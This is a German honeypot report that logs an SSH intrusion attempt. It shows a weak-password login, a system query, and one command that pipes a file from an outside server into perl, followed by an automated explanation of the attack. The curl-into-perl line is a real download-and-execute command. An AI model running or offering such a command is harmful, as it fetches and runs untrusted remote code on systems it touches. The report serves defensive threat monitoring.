ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Australien: Schadcode nachladen und System erkunden

30.09.2026, 03:58 UTC · 2 Befehle · über ssh · Australien

Überblick

Dienst
ssh (Port 22)
Herkunft
Australien · Microsoft Corporation
Probierte Zugangsdaten
shiragaki / 123456

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
shiragaki@srv01: ~

shiragaki@srv01:~$ uname -a 2>/dev/null
Linux srv01 4.15.0-213-generic #213-Ubuntu SMP Fri Mar 11 13:42:28 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
shiragaki@srv01:~$ curl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl &
[1] 1423

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich über SSH mit den Credentials shiragaki und 123456 an. Nach der Anmeldung führte er zunächst eine Systemabfrage durch, um die Kernel- und Architekturinformationen des Zielsystems zu ermitteln. Anschließend lud er eine Datei von einem externen Server herunter und leitete diese direkt an den Perl-Interpreter weiter, um Code auszuführen.

Was die Befehle bewirken

Der Befehl uname -a gibt detaillierte Informationen über den Linux-Kernel und die Hardware-Architektur aus, wobei Fehlermeldungen unterdrückt werden. Das curl-Kommando lädt eine Datei namens zed vom angegebenen Server herunter, wobei die Option --max-time 1 einen Timeout von einer Sekunde erzwingt, um hängende Verbindungen zu vermeiden. Die Pipe leitet den empfangenen Datenstrom direkt an perl weiter, was bedeutet, dass der Inhalt der Datei als Perl-Skript interpretiert und ausgeführt wird. Die Ausgabe [1] 1423 zeigt an, dass der Prozess im Hintergrund gestartet wurde.

Worauf es hinauslief

Das Vorgehen deutet auf die Installation eines Botnet-Agents oder eines Kryptominers hin, da der Angreifer versucht, fremden Code ohne Zwischenspeicherung auf der Festplatte auszuführen. Die Verwendung von Perl als Ausführungsumgebung ist ein typisches Muster für Skripte, die sich in bestehenden Prozessen einnisten oder Ressourcen missbrauchen. Da keine weiteren Persistenz-Befehle sichtbar sind, bleibt das genaue Endziel der Payload offen.

Einordnung

Dieses Muster ist im Honeypot-Betrieb sehr häufig anzutreffen, da automatisierte Scanner standardisierte Skripte über kurze Timeouts verteilen. Die Nutzung von Microsoft-Netzwerken als Absprungpunkt ist ebenfalls ein bekanntes Phänomen, das oft auf kompromittierte Cloud-Instanzen hindeutet.